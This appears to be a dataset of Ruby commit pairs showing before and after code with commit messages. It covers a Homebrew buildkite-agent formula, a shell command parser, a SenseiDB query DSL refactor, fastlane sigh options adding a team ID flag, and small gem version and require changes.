  # Token from --token= (Homebrew.args replaces the ARGV API removed in
  # Homebrew 2.3.0), falling back to the placeholder.
  def agent_token
    Homebrew.args.value("token") || default_agent_token
  end

  def agent_etc
    etc/"buildkite-agent"
  end

  def agent_var
    var/"buildkite-agent"
  end

  def agent_hooks_path
    agent_etc/"hooks"
  end

  def agent_builds_path
    agent_var/"builds"
  end

  def agent_plugins_path
    agent_var/"plugins"
  end

  # Bootstrap script: stable tarballs ship bootstrap.sh; otherwise use the
  # agent's built-in bootstrap sub-command.
  def agent_bootstrap_path
    if stable?
      agent_etc/"bootstrap.sh"
    else
      opt_bin/"buildkite-agent bootstrap"
    end
  end

  def agent_config_path
    agent_etc/"buildkite-agent.cfg"
  end

  # Reference copy of the default config, refreshed on every install.
  def agent_config_dist_path
    pkgshare/"buildkite-agent.dist.cfg"
  end

  def install
    agent_etc.mkpath
    agent_var.mkpath
    pkgshare.mkpath
    agent_hooks_path.mkpath
    agent_builds_path.mkpath
    agent_hooks_path.install Dir["hooks/*"]
    # bootstrap.sh only ships with stable release tarballs
    if stable?
      agent_etc.install "bootstrap.sh"
    end
    # Always refresh the dist copy, but never clobber an existing
    # (possibly user-edited) config.
    agent_config_dist_path.write(default_config_file)
    if agent_config_path.exist?
      puts "\033[35mIgnoring existing config file at #{agent_config_path}\033[0m"
      puts "\033[35mFor changes see the updated dist copy at #{agent_config_dist_path}\033[0m"
    else
      agent_config_path.write(default_config_file(agent_token))
    end
    bin.install "buildkite-agent"
  end

  # Render the bundled config template with the token and this formula's
  # paths substituted in.
  def default_config_file(agent_token = default_agent_token)
    File.read("buildkite-agent.cfg")
      .gsub(/token=.+/, "token=\"#{agent_token}\"")
      .gsub(/bootstrap-script=.+/, "bootstrap-script=\"#{agent_bootstrap_path}\"")
      .gsub(/build-path=.+/, "build-path=\"#{agent_builds_path}\"")
      .gsub(/hooks-path=.+/, "hooks-path=\"#{agent_hooks_path}\"")
      .gsub(/plugins-path=.+/, "plugins-path=\"#{agent_plugins_path}\"")
  end

  def caveats
    <<~EOS
      \033[32mbuildkite-agent is now installed!\033[0m#{agent_token_reminder}
      Configuration file (to configure agent meta-data, priority, name, etc):
      #{agent_config_path}
      Hooks directory (for customising the agent):
      #{agent_hooks_path}
      Builds directory:
      #{agent_builds_path}
      Log paths:
      #{var}/log/buildkite-agent.log
      #{var}/log/buildkite-agent.error.log
      If you set up the LaunchAgent, set your machine to auto-login as
      your current user. It's also recommended to install Caffeine
      (http://lightheadsw.com/caffeine/) to prevent your machine from going to
      sleep or logging out.
      To run multiple agents simply run the buildkite-agent start command
      multiple times, or duplicate the LaunchAgent plist to create another
      that starts on login.
    EOS
  end

  plist_options :manual => "buildkite-agent start"

  # LaunchAgent: start at load, restart on unclean exit (30s throttle).
  # Fixed: StandardErrorPath now points at buildkite-agent.error.log, the
  # path advertised in caveats (it previously duplicated StandardOutPath).
  def plist
    <<~EOS
      <?xml version="1.0" encoding="UTF-8"?>
      <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
      <plist version="1.0">
      <dict>
      <key>Label</key>
      <string>#{plist_name}</string>
      <key>WorkingDirectory</key>
      <string>#{HOMEBREW_PREFIX}/bin</string>
      <key>ProgramArguments</key>
      <array>
      <string>#{HOMEBREW_PREFIX}/bin/buildkite-agent</string>
      <string>start</string>
      <string>--config</string>
      <string>#{agent_config_path}</string>
      <!--<string>--debug</string>-->
      </array>
      <key>EnvironmentVariables</key>
      <dict>
      <key>PATH</key>
      <string>#{HOMEBREW_PREFIX}/bin:/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin</string>
      </dict>
      <key>RunAtLoad</key>
      <true/>
      <key>KeepAlive</key>
      <dict>
      <key>SuccessfulExit</key>
      <false/>
      </dict>
      <key>ProcessType</key>
      <string>Interactive</string>
      <key>ThrottleInterval</key>
      <integer>30</integer>
      <key>StandardOutPath</key>
      <string>#{var}/log/buildkite-agent.log</string>
      <key>StandardErrorPath</key>
      <string>#{var}/log/buildkite-agent.error.log</string>
      </dict>
      </plist>
    EOS
  end

  # Returns a red reminder string when the installed config still contains
  # the placeholder token; "" when no config exists; nil otherwise.
  def agent_token_reminder
    return "" unless agent_config_path.exist?
    if agent_config_path.read.include?(default_agent_token)
      "\n \n \033[31mDon't forget to update your configuration file with your agent token\033[0m"
    end
  end

  # Smoke test: the installed binary responds to --help.
  test do
    system "#{bin}/buildkite-agent", "--help"
  end
end
|
# -*- coding: utf-8 -*-
module RunSh
  # Refinement that lets a plain String act as a syntax-struct node:
  # under `using RunSh::SyntaxStructString`, String#to_cmd_field returns
  # the string itself (no substitution or expansion).
  module SyntaxStructString
    refine String do
      def to_cmd_field(cmd_intp, context)
        self
      end
    end
  end
end
using RunSh::SyntaxStructString
module RunSh
module SyntaxStruct
class CommandList
def initialize(eoc: nil)
@fields = []
@eoc = eoc
end
attr_reader :fields
attr_accessor :eoc
def ==(other)
if (other.is_a? CommandList) then
@fields == other.fields && @eoc == other.eoc
end
end
def empty?
@fields.empty?
end
def add(field_list)
@fields << field_list
self
end
def strip!
while (! @fields.empty? && @fields.last.empty?)
@fields.pop
end
self
end
def to_cmd_exec_list(cmd_intp, context)
@fields.map{|field_list|
field_list.to_cmd_field(cmd_intp, context)
}
end
end
class FieldList
def initialize
@values = []
end
attr_reader :values
def ==(other)
if (other.is_a? FieldList) then
@values == other.values
end
end
def empty?
@values.empty?
end
def add(value)
@values << value
self
end
def to_cmd_field(cmd_intp, context)
@values.map{|field_value|
field_value.to_cmd_field(cmd_intp, context)
}.join('')
end
end
class QuotedString
def initialize
@string = ''
end
attr_reader :string
def ==(other)
if (other.is_a? QuotedString) then
@string == other.string
end
end
def add(string)
@string << string
self
end
def to_cmd_field(cmd_intp, context)
@string
end
end
class DoubleQuotedList
def initialize
@values = []
end
attr_reader :values
def ==(other)
if (other.is_a? DoubleQuotedList) then
@values == other.values
end
end
def add(value)
if ((value.is_a? String) &&
(@values.length > 0) && (@values.last.is_a? String))
then
@values.last << value
else
@values << value
end
self
end
def to_cmd_field(cmd_intp, context)
@values.map{|field_value|
field_value.to_cmd_field(cmd_intp, context)
}.join('')
end
end
end
class CommandParser
include SyntaxStruct
def initialize(token_src)
@token_src = token_src
@cmd_nest = 0
end
def parsing_command?
@cmd_nest >= 1
end
def each_token
begin
loop do
token_name, token_value = @token_src.next
yield(token_name, token_value)
end
rescue StopIteration
# end of loop
end
end
private :each_token
def parse_command
@cmd_nest += 1
begin
cmd_list = CommandList.new
field_list = FieldList.new
cmd_list.add(field_list)
each_token do |token_name, token_value|
case (token_name)
when :space
unless (field_list.empty?) then
field_list = FieldList.new
cmd_list.add(field_list)
end
when :escape
escaped_char = token_value[1..-1]
if (escaped_char != "\n") then
field_list.add(QuotedString.new.add(escaped_char))
end
when :quote
field_list.add(parse_single_quote)
when :qquote
field_list.add(parse_double_quote)
when :cmd_sep, :cmd_term
cmd_list.eoc = token_value
return cmd_list.strip!
else
field_list.add(token_value)
end
end
cmd_list.strip!
cmd_list unless cmd_list.empty?
ensure
@cmd_nest -= 1
end
end
def parse_single_quote
qs = QuotedString.new
each_token do |token_name, token_value|
case (token_name)
when :quote
return qs
else
qs.add(token_value)
end
end
raise "syntax error: not terminated single-quoted string: #{qs.string}"
end
def parse_double_quote
qq_list = DoubleQuotedList.new
each_token do |token_name, token_value|
case (token_name)
when :qquote
return qq_list
when :escape
escaped_char = token_value[1..-1]
if (escaped_char != "\n") then
qq_list.add(escaped_char)
end
else
qq_list.add(token_value)
end
end
raise "syntax error: not terminated double-quoted string: #{qq_list.values}"
end
end
end
# Local Variables:
# mode: Ruby
# indent-tabs-mode: nil
# End:
command parser syntax. anonymous refine.
# -*- coding: utf-8 -*-
module RunSh
module SyntaxStruct
# Activate an anonymous refinement so plain String tokens respond to
# #to_cmd_field like the syntax-struct classes do; a bare String expands
# to itself. The refinement is lexically scoped to this module body.
using Module.new{
  refine String do
    def to_cmd_field(cmd_intp, context)
      self
    end
  end
}
# One parsed command: an ordered list of fields plus the end-of-command
# token (+eoc+, e.g. ";" or a newline) that terminated it.
class CommandList
  attr_reader :fields
  attr_accessor :eoc

  def initialize(eoc: nil)
    @fields = []
    @eoc = eoc
  end

  # Structural equality: same fields and same end-of-command token.
  # Returns nil (falsy) for non-CommandList operands.
  def ==(other)
    if (other.is_a? CommandList) then
      @fields == other.fields && @eoc == other.eoc
    end
  end

  def empty?
    @fields.empty?
  end

  # Append a field list; returns self for chaining.
  def add(field_list)
    @fields << field_list
    self
  end

  # Drop trailing empty field lists; returns self.
  def strip!
    @fields.pop while !@fields.empty? && @fields.last.empty?
    self
  end

  # Expand every field into its concrete string for execution.
  def to_cmd_exec_list(cmd_intp, context)
    @fields.map { |fl| fl.to_cmd_field(cmd_intp, context) }
  end
end
# One command field assembled from adjacent token values (bare words,
# quoted strings, ...); joining their expansions yields the field text.
class FieldList
  attr_reader :values

  def initialize
    @values = []
  end

  # Structural equality on the value list; nil for non-FieldList operands.
  def ==(other)
    if (other.is_a? FieldList) then
      @values == other.values
    end
  end

  def empty?
    @values.empty?
  end

  # Append a value; returns self for chaining.
  def add(value)
    @values << value
    self
  end

  # Concatenate the expansion of every value into the final field string.
  def to_cmd_field(cmd_intp, context)
    @values.map { |v| v.to_cmd_field(cmd_intp, context) }.join('')
  end
end
# A single-quoted chunk: its contents pass through expansion verbatim.
class QuotedString
  attr_reader :string

  def initialize
    @string = ''
  end

  # Structural equality on the text; nil for non-QuotedString operands.
  def ==(other)
    if (other.is_a? QuotedString) then
      @string == other.string
    end
  end

  # Append raw text; returns self for chaining.
  def add(text)
    @string << text
    self
  end

  # Quoted text expands to itself, with no substitution.
  def to_cmd_field(cmd_intp, context)
    @string
  end
end
# A double-quoted chunk: a mix of literal strings and substitutable
# values. Consecutive literal strings are coalesced as they are added.
class DoubleQuotedList
  attr_reader :values

  def initialize
    @values = []
  end

  # Structural equality on the value list; nil for other operand types.
  def ==(other)
    if (other.is_a? DoubleQuotedList) then
      @values == other.values
    end
  end

  # Append a value, merging it into the previous entry when both are
  # plain Strings; returns self for chaining.
  def add(value)
    tail = @values.last
    if value.is_a?(String) && tail.is_a?(String)
      tail << value
    else
      @values << value
    end
    self
  end

  # Expand and join every component into the final string.
  def to_cmd_field(cmd_intp, context)
    @values.map { |v| v.to_cmd_field(cmd_intp, context) }.join('')
  end
end
end
# Token-stream parser that assembles shell-like commands from the
# (token_name, token_value) pairs produced by the lexer.
class CommandParser
  include SyntaxStruct

  # +token_src+ is an Enumerator-like source responding to #next with
  # [token_name, token_value] pairs.
  def initialize(token_src)
    @token_src = token_src
    @cmd_nest = 0
  end

  # True while parse_command is on the call stack (nesting depth >= 1).
  def parsing_command?
    @cmd_nest >= 1
  end

  # Yield each remaining token pair; returns quietly once the stream is
  # exhausted (#next raises StopIteration).
  def each_token
    begin
      loop do
        token_name, token_value = @token_src.next
        yield(token_name, token_value)
      end
    rescue StopIteration
      # end of loop
    end
  end
  private :each_token

  # Parse one command from the token stream. Returns a CommandList, or
  # nil when only empty input remained.
  #
  # Token handling:
  #   :space             -- starts a new field (unless the current one is empty)
  #   :escape            -- backslash pair; the escaped char is kept quoted,
  #                         except an escaped newline, which is dropped
  #   :quote / :qquote   -- opens a single-/double-quoted string
  #   :cmd_sep/:cmd_term -- terminates the command (stored as eoc)
  #   anything else      -- raw token text appended to the current field
  def parse_command
    @cmd_nest += 1
    begin
      cmd_list = CommandList.new
      field_list = FieldList.new
      cmd_list.add(field_list)
      each_token do |token_name, token_value|
        case (token_name)
        when :space
          unless (field_list.empty?) then
            field_list = FieldList.new
            cmd_list.add(field_list)
          end
        when :escape
          escaped_char = token_value[1..-1]
          if (escaped_char != "\n") then
            field_list.add(QuotedString.new.add(escaped_char))
          end
        when :quote
          field_list.add(parse_single_quote)
        when :qquote
          field_list.add(parse_double_quote)
        when :cmd_sep, :cmd_term
          cmd_list.eoc = token_value
          return cmd_list.strip!
        else
          field_list.add(token_value)
        end
      end
      cmd_list.strip!
      cmd_list unless cmd_list.empty?
    ensure
      @cmd_nest -= 1
    end
  end

  # Consume tokens until the closing single quote; raises when the
  # stream ends before the quote is closed.
  def parse_single_quote
    qs = QuotedString.new
    each_token do |token_name, token_value|
      case (token_name)
      when :quote
        return qs
      else
        qs.add(token_value)
      end
    end
    raise "syntax error: not terminated single-quoted string: #{qs.string}"
  end

  # Consume tokens until the closing double quote, handling escapes the
  # same way parse_command does; raises when the stream ends first.
  def parse_double_quote
    qq_list = DoubleQuotedList.new
    each_token do |token_name, token_value|
      case (token_name)
      when :qquote
        return qq_list
      when :escape
        escaped_char = token_value[1..-1]
        if (escaped_char != "\n") then
          qq_list.add(escaped_char)
        end
      else
        qq_list.add(token_value)
      end
    end
    raise "syntax error: not terminated double-quoted string: #{qq_list.values}"
  end
end
end
# Local Variables:
# mode: Ruby
# indent-tabs-mode: nil
# End:
|
# Gem version constant for s3io.
module S3io
  VERSION = "1.1.2"
end
version bumped to 1.1.3
# Gem version constant for s3io.
module S3io
  VERSION = "1.1.3"
end
|
# Query DSL for SenseiDB
# The basic grammar is as follows:
# query := q(field => value) (produces a term query)
# / q(field => [values ...]) (produces a boolean query composed of
# the OR of {field => value} queries for each value)
# / q(field => (start..end)) (produces a range query on field between start and end)
# / query & query (ANDs two subqueries together)
# / query | query (ORs two subqueries together)
#
# value := something that should probably be a string, but might work if it isn't
#
# Note: use of the `q' operator must be performed within the context of
# a Sensei::Query.construct block, i.e.
# Sensei::Query.construct do
# (q(:foo => (15..30)) & q(:bar => '1')).boost!(10) | q(:baz => 'wiz')
# end
# If you're not in a construct block, you can still do Sensei::Query.q(...).
module Sensei
module Operators
def &(x)
return self if self == x
return self if x.is_a? EmptyQuery
BoolQuery.new(:operands => [self.to_sensei, x.to_sensei], :operation => :must)
end
def |(x)
return self if self == x
return self if x.is_a? EmptyQuery
BoolQuery.new(:operands => [self.to_sensei, x.to_sensei], :operation => :should)
end
def ~
self.must_not
end
def *(x)
self.boost!(x)
end
def must_not
BoolQuery.new(:operands => [self.to_sensei], :operation => :must_not)
end
def boost! amt
self.to_sensei.tap do |x| x.options[:boost] = amt end
end
end
class Query
attr_accessor :options
cattr_accessor :result_klass
include Operators
def initialize(opts={})
@options = opts
end
def get_boost
options[:boost] ? {:boost => options[:boost]} : {}
end
def to_sensei
self
end
def self.construct &block
class_eval(&block)
end
def self.q(h)
h.to_sensei
end
def not_query?
self.is_a?(Sensei::BoolQuery) && options[:operation] == :must_not
end
def run(options = {})
results = Sensei::Client.new(options.merge(:query => self)).search
if @@result_klass
@@result_klass.new(results)
else
results
end
end
end
class BoolQuery < Query
def operands
options[:operands]
end
def to_h
if self.not_query?
raise Exception, "Error: independent boolean NOT query not allowed."
end
not_queries, non_not_queries = operands.partition(&:not_query?)
not_queries = not_queries.map{|x| x.operands.map(&:to_h)}.flatten
non_not_queries = non_not_queries.reject{|x| x.is_a? AllQuery} if options[:operation] == :must
subqueries = non_not_queries.map(&:to_h)
mergeable, nonmergeable = subqueries.partition do |x|
isbool = x[:bool]
sameop = isbool && isbool[options[:operation]]
boosted = isbool && isbool[:boost]
isbool && sameop && (boosted.nil? || boosted == options[:boost])
end
merged_queries = mergeable.map{|x| x[:bool][options[:operation]]}.flatten(1)
merged_nots = mergeable.map{|x| x[:bool][:must_not] || []}.flatten(1)
all_nots = merged_nots + not_queries
not_clause = (all_nots.count > 0 ? {:must_not => all_nots} : {})
{:bool => {
options[:operation] => nonmergeable + merged_queries
}.merge(get_boost).merge(not_clause)
}
end
end
class TermQuery < Query
def to_h
{:term => {options[:field] => {:value => options[:value].to_s}.merge(get_boost)}}
end
end
class TermsQuery < Query
def to_h
{:terms => {options[:field] => {:values => options[:values].map(&:to_s)}.merge(get_boost)}}
end
end
class RangeQuery < Query
def to_h
{:range => {
options[:field] => {
:from => options[:from],
:to => options[:to],
:_type => options[:type] || ((options[:from].is_a?(Float) || options[:to].is_a?(Float)) ? "double" : "float")
}.merge(get_boost).merge(options[:type] == :date ? {:_date_format => options[:date_format] || 'YYYY-MM-DD'} : {})
},
}
end
end
class EmptyQuery < Query
def &(x)
x
end
def |(x)
x
end
def ~
raise 'Should not call on an empty query'
end
def *(x)
raise 'Should not call on an empty query'
end
def must_not
raise 'Should not call on an empty query'
end
def boost! amt
raise 'Should not call on an empty query'
end
def to_h
{}
end
end
class AllQuery < Query
def to_h
{:match_all => {}.merge(get_boost)}
end
end
class UIDQuery < Query
def initialize(uids)
uids = [uids] unless uids.is_a?(Array)
@uids = uids
end
def to_h
{:ids => {:values => @uids}}
end
end
end
class Hash
  # Convert a one-pair hash {field => value} into a Sensei query.
  # Scalar values (strings and numbers) become term queries; anything
  # else (Range, Array, ...) is delegated to value.to_sensei(field).
  def to_sensei
    field, value = self.first
    case value
    when String, Numeric
      # `when String, Numeric` replaces the explicit class list
      # [String, Fixnum, Float, Bignum]: Fixnum/Bignum were removed in
      # Ruby 3.2 and would raise NameError here. Numeric covers all the
      # previously-listed numeric classes.
      Sensei::TermQuery.new(:field => field, :value => value)
    else
      value.to_sensei(field)
    end
  end
end
class Range
def to_sensei(field)
Sensei::RangeQuery.new(:from => self.begin, :to => self.end, :field => field)
end
end
class Array
def to_sensei(field, op=:should)
Sensei::BoolQuery.new(:operation => op, :operands => self.map{|value| {field => value}.to_sensei})
end
end
refactor array to_sensei method to use TermsQuery
# Query DSL for SenseiDB
# The basic grammar is as follows:
# query := q(field => value) (produces a term query)
# / q(field => [values ...]) (produces a boolean query composed of
# the OR of {field => value} queries for each value)
# / q(field => (start..end)) (produces a range query on field between start and end)
# / query & query (ANDs two subqueries together)
# / query | query (ORs two subqueries together)
#
# value := something that should probably be a string, but might work if it isn't
#
# Note: use of the `q' operator must be performed within the context of
# a Sensei::Query.construct block, i.e.
# Sensei::Query.construct do
# (q(:foo => (15..30)) & q(:bar => '1')).boost!(10) | q(:baz => 'wiz')
# end
# If you're not in a construct block, you can still do Sensei::Query.q(...).
module Sensei
  # Operator mixin giving queries (and anything convertible via #to_sensei)
  # a composable boolean algebra:
  #   a & b  -- AND (bool :must);  a & a == a;  empty query is the identity
  #   a | b  -- OR  (bool :should)
  #   ~a     -- NOT (bool :must_not)
  #   a * n  -- boost by n
  module Operators
    def &(x)
      return self if self == x
      return self if x.is_a? EmptyQuery
      BoolQuery.new(:operands => [self.to_sensei, x.to_sensei], :operation => :must)
    end
    def |(x)
      return self if self == x
      return self if x.is_a? EmptyQuery
      BoolQuery.new(:operands => [self.to_sensei, x.to_sensei], :operation => :should)
    end
    def ~
      self.must_not
    end
    def *(x)
      self.boost!(x)
    end
    # Wrap this query in a bool must_not clause.
    def must_not
      BoolQuery.new(:operands => [self.to_sensei], :operation => :must_not)
    end
    # Set the boost factor (mutates options) and return the query.
    def boost! amt
      self.to_sensei.tap do |x| x.options[:boost] = amt end
    end
  end
  # Base class for all Sensei queries. Subclasses implement #to_h,
  # producing the JSON-ready hash for the SenseiDB API.
  class Query
    attr_accessor :options
    cattr_accessor :result_klass  # optional wrapper class applied to results
    include Operators
    def initialize(opts={})
      @options = opts
    end
    # {:boost => n} fragment, or {} when no boost is set.
    def get_boost
      options[:boost] ? {:boost => options[:boost]} : {}
    end
    def to_sensei
      self
    end
    # Evaluate +block+ in class context so bare `q(...)` calls work.
    def self.construct &block
      class_eval(&block)
    end
    def self.q(h)
      h.to_sensei
    end
    # True when this is a bool must_not query.
    def not_query?
      self.is_a?(Sensei::BoolQuery) && options[:operation] == :must_not
    end
    # Execute the query via Sensei::Client; wraps results in
    # result_klass when one is configured.
    def run(options = {})
      results = Sensei::Client.new(options.merge(:query => self)).search
      if @@result_klass
        @@result_klass.new(results)
      else
        results
      end
    end
  end
  # Boolean combination (must / should / must_not) of sub-queries.
  class BoolQuery < Query
    def operands
      options[:operands]
    end
    # Serialize to a hash, flattening where possible:
    #  * NOT sub-queries are hoisted into this node's :must_not clause
    #  * child bool queries with the same operation (and no conflicting
    #    boost) are merged into this node instead of being nested
    #  * match_all children are dropped from AND queries (they are no-ops)
    def to_h
      if self.not_query?
        raise Exception, "Error: independent boolean NOT query not allowed."
      end
      not_queries, non_not_queries = operands.partition(&:not_query?)
      not_queries = not_queries.map{|x| x.operands.map(&:to_h)}.flatten
      non_not_queries = non_not_queries.reject{|x| x.is_a? AllQuery} if options[:operation] == :must
      subqueries = non_not_queries.map(&:to_h)
      mergeable, nonmergeable = subqueries.partition do |x|
        isbool = x[:bool]
        sameop = isbool && isbool[options[:operation]]
        boosted = isbool && isbool[:boost]
        isbool && sameop && (boosted.nil? || boosted == options[:boost])
      end
      merged_queries = mergeable.map{|x| x[:bool][options[:operation]]}.flatten(1)
      merged_nots = mergeable.map{|x| x[:bool][:must_not] || []}.flatten(1)
      all_nots = merged_nots + not_queries
      not_clause = (all_nots.count > 0 ? {:must_not => all_nots} : {})
      {:bool => {
        options[:operation] => nonmergeable + merged_queries
      }.merge(get_boost).merge(not_clause)
      }
    end
  end
  # Exact match on a single field/value pair.
  class TermQuery < Query
    def to_h
      {:term => {options[:field] => {:value => options[:value].to_s}.merge(get_boost)}}
    end
  end
  # Match any of several values on one field (OR semantics).
  class TermsQuery < Query
    def to_h
      {:terms => {options[:field] => {:values => options[:values].map(&:to_s)}.merge(get_boost)}}
    end
  end
  # Range match on one field; numeric type defaults to double/float,
  # with optional date handling via options[:type] == :date.
  class RangeQuery < Query
    def to_h
      {:range => {
        options[:field] => {
          :from => options[:from],
          :to => options[:to],
          :_type => options[:type] || ((options[:from].is_a?(Float) || options[:to].is_a?(Float)) ? "double" : "float")
        }.merge(get_boost).merge(options[:type] == :date ? {:_date_format => options[:date_format] || 'YYYY-MM-DD'} : {})
      },
      }
    end
  end
  # Identity element for & and |; cannot be negated, boosted or serialized
  # into a meaningful clause on its own.
  class EmptyQuery < Query
    def &(x)
      x
    end
    def |(x)
      x
    end
    def ~
      raise 'Should not call on an empty query'
    end
    def *(x)
      raise 'Should not call on an empty query'
    end
    def must_not
      raise 'Should not call on an empty query'
    end
    def boost! amt
      raise 'Should not call on an empty query'
    end
    def to_h
      {}
    end
  end
  # Matches every document.
  class AllQuery < Query
    def to_h
      {:match_all => {}.merge(get_boost)}
    end
  end
  # Match documents by UID; accepts a single uid or an array.
  class UIDQuery < Query
    def initialize(uids)
      uids = [uids] unless uids.is_a?(Array)
      @uids = uids
    end
    def to_h
      {:ids => {:values => @uids}}
    end
  end
end
class Hash
  # Convert a one-pair hash {field => value} into a Sensei query.
  # Scalar values (strings and numbers) become term queries; anything
  # else (Range, Array, ...) is delegated to value.to_sensei(field).
  def to_sensei
    field, value = self.first
    case value
    when String, Numeric
      # `when String, Numeric` replaces the explicit class list
      # [String, Fixnum, Float, Bignum]: Fixnum/Bignum were removed in
      # Ruby 3.2 and would raise NameError here. Numeric covers all the
      # previously-listed numeric classes.
      Sensei::TermQuery.new(:field => field, :value => value)
    else
      value.to_sensei(field)
    end
  end
end
class Range
  # Convert this Range into a Sensei range query over +field+, spanning
  # the range's begin..end endpoints.
  def to_sensei(field)
    range_opts = { :from => self.begin, :to => self.end, :field => field }
    Sensei::RangeQuery.new(range_opts)
  end
end
class Array
  # Convert an array of values into a query on +field+. For the default
  # :should (OR) semantics, a single terms query is emitted; any other
  # boolean operation falls back to a bool query over per-value term
  # queries.
  def to_sensei(field, op=:should)
    if op == :should
      Sensei::TermsQuery.new(:field => field, :values => self)
    else
      Sensei::BoolQuery.new(:operation => op, :operands => self.map{|value| {field => value}.to_sensei})
    end
  end
end
|
Add sentry-raven.rb to auto require raven (fixes GH-35)
require "raven" |
require 'fastlane_core'
module Sigh
class Options
def self.available_options
@@options ||= [
FastlaneCore::ConfigItem.new(key: :adhoc,
env_name: "SIGH_AD_HOC",
description: "Setting this flag will generate AdHoc profiles instead of App Store Profiles",
is_string: false),
FastlaneCore::ConfigItem.new(key: :skip_install,
env_name: "SIGH_SKIP_INSTALL",
description: "By default, the certificate will be added on your local machine. Setting this flag will skip this action",
is_string: false),
FastlaneCore::ConfigItem.new(key: :development,
env_name: "SIGH_DEVELOPMENT",
description: "Renew the development certificate instead of the production one",
is_string: false),
FastlaneCore::ConfigItem.new(key: :force,
env_name: "SIGH_FORCE",
description: "Renew non-development provisioning profiles regardless of its state",
is_string: false),
FastlaneCore::ConfigItem.new(key: :app_identifier,
short_option: "-a",
env_name: "SIGH_APP_IDENTIFIER",
description: "The bundle identifier of your app",
default_value: CredentialsManager::AppfileConfig.try_fetch_value(:app_identifier)),
FastlaneCore::ConfigItem.new(key: :username,
short_option: "-u",
env_name: "SIGH_USERNAME",
description: "Your Apple ID Username",
default_value: CredentialsManager::AppfileConfig.try_fetch_value(:apple_id),
verify_block: Proc.new do |value|
CredentialsManager::PasswordManager.shared_manager(value)
end),
FastlaneCore::ConfigItem.new(key: :provisioning_file_name,
short_option: "-n",
env_name: "SIGH_PROVISIONING_PROFILE_NAME",
description: "The name of the generated certificate file",
optional: true),
FastlaneCore::ConfigItem.new(key: :output_path,
short_option: "-o",
env_name: "SIGH_OUTPUT_PATH",
description: "Directory in which the profile should be stored",
default_value: ".",
verify_block: Proc.new do |value|
raise "Could not find output directory '#{value}'".red unless File.exists?(value)
end),
FastlaneCore::ConfigItem.new(key: :cert_id,
short_option: "-i",
env_name: "SIGH_CERTIFICATE_ID",
description: "The ID of the certificate to use",
optional: true),
FastlaneCore::ConfigItem.new(key: :cert_owner_name,
short_option: "-c",
env_name: "SIGH_CERTIFICATE",
description: "The certificate name to use for new profiles, or to renew with. (e.g. \"Felix Krause\")",
optional: true),
FastlaneCore::ConfigItem.new(key: :cert_date,
short_option: "-d",
env_name: "SIGH_CERTIFICATE_EXPIRE_DATE",
description: "The certificate with the given expiry date used to renew. (e.g. \"Nov 11, 2017\")",
optional: true),
FastlaneCore::ConfigItem.new(key: :filename,
short_option: "-f",
env_name: "SIGH_PROFILE_FILE_NAME",
optional: true,
description: "Filename to use for the generated provisioning profile (must include .mobileprovision)",
verify_block: Proc.new do |value|
raise "The output name must end with .mobileprovision".red unless value.end_with?".mobileprovision"
end)
]
end
end
end
Added support for TEAM_ID using CLI
require 'fastlane_core'
module Sigh
  # All CLI/env options understood by sigh, expressed as
  # FastlaneCore::ConfigItem definitions (memoized in @@options).
  class Options
    def self.available_options
      @@options ||= [
        FastlaneCore::ConfigItem.new(key: :adhoc,
                                     env_name: "SIGH_AD_HOC",
                                     description: "Setting this flag will generate AdHoc profiles instead of App Store Profiles",
                                     is_string: false),
        FastlaneCore::ConfigItem.new(key: :skip_install,
                                     env_name: "SIGH_SKIP_INSTALL",
                                     description: "By default, the certificate will be added on your local machine. Setting this flag will skip this action",
                                     is_string: false),
        FastlaneCore::ConfigItem.new(key: :development,
                                     env_name: "SIGH_DEVELOPMENT",
                                     description: "Renew the development certificate instead of the production one",
                                     is_string: false),
        FastlaneCore::ConfigItem.new(key: :force,
                                     env_name: "SIGH_FORCE",
                                     description: "Renew non-development provisioning profiles regardless of its state",
                                     is_string: false),
        FastlaneCore::ConfigItem.new(key: :app_identifier,
                                     short_option: "-a",
                                     env_name: "SIGH_APP_IDENTIFIER",
                                     description: "The bundle identifier of your app",
                                     default_value: CredentialsManager::AppfileConfig.try_fetch_value(:app_identifier)),
        FastlaneCore::ConfigItem.new(key: :username,
                                     short_option: "-u",
                                     env_name: "SIGH_USERNAME",
                                     description: "Your Apple ID Username",
                                     default_value: CredentialsManager::AppfileConfig.try_fetch_value(:apple_id),
                                     verify_block: Proc.new do |value|
                                       CredentialsManager::PasswordManager.shared_manager(value)
                                     end),
        FastlaneCore::ConfigItem.new(key: :team_id,
                                     short_option: "-t",
                                     env_name: "SIGH_TEAM_ID",
                                     description: "The ID of your team if you're in multiple teams",
                                     optional: true,
                                     verify_block: Proc.new do |value|
                                       # downstream tooling reads the team from this env var
                                       ENV["FASTLANE_TEAM_ID"] = value
                                     end),
        FastlaneCore::ConfigItem.new(key: :provisioning_file_name,
                                     short_option: "-n",
                                     env_name: "SIGH_PROVISIONING_PROFILE_NAME",
                                     description: "The name of the generated certificate file",
                                     optional: true),
        FastlaneCore::ConfigItem.new(key: :output_path,
                                     short_option: "-o",
                                     env_name: "SIGH_OUTPUT_PATH",
                                     description: "Directory in which the profile should be stored",
                                     default_value: ".",
                                     verify_block: Proc.new do |value|
                                       # File.exist? replaces File.exists?, which was
                                       # deprecated and removed in Ruby 3.2
                                       raise "Could not find output directory '#{value}'".red unless File.exist?(value)
                                     end),
        FastlaneCore::ConfigItem.new(key: :cert_id,
                                     short_option: "-i",
                                     env_name: "SIGH_CERTIFICATE_ID",
                                     description: "The ID of the certificate to use",
                                     optional: true),
        FastlaneCore::ConfigItem.new(key: :cert_owner_name,
                                     short_option: "-c",
                                     env_name: "SIGH_CERTIFICATE",
                                     description: "The certificate name to use for new profiles, or to renew with. (e.g. \"Felix Krause\")",
                                     optional: true),
        FastlaneCore::ConfigItem.new(key: :cert_date,
                                     short_option: "-d",
                                     env_name: "SIGH_CERTIFICATE_EXPIRE_DATE",
                                     description: "The certificate with the given expiry date used to renew. (e.g. \"Nov 11, 2017\")",
                                     optional: true),
        FastlaneCore::ConfigItem.new(key: :filename,
                                     short_option: "-f",
                                     env_name: "SIGH_PROFILE_FILE_NAME",
                                     optional: true,
                                     description: "Filename to use for the generated provisioning profile (must include .mobileprovision)",
                                     verify_block: Proc.new do |value|
                                       raise "The output name must end with .mobileprovision".red unless value.end_with?(".mobileprovision")
                                     end)
      ]
    end
  end
end
|
Sroot = Dir.pwd + '/'
module Simrb
# common methods
class << self
def yaml_read path
require 'yaml'
YAML.load_file path
rescue
[]
end
def yaml_write path, data
require "yaml"
